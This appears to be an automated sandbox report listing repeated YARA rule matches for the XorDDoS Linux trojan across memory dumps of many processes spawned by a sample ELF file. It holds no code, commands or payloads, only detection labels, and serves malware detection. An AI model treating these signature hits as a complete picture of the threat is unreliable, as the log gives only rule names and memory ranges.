Source: 5675.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5541.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5691.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5470.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5481.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5746.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5620.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5694.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5765.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5623.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5609.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5677.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5461.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5631.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5504.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5648.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5556.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5589.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5501.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5726.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5666.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5729.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5672.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5606.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5458.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5612.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5553.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5538.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5731.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5716.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5657.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5592.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5734.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5660.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5643.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5663.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5568.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5548.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5473.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5763.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5573.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5582.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5737.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5551.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5436.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5696.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5625.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5646.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5641.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5711.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5478.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5708.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5475.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5433.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5748.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5719.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5594.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5453.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5699.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5753.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 5565.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: Process Memory Space: eTASxT3bjO.elf PID: 5433, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5435, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: eTASxT3bjO.elf PID: 5436, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
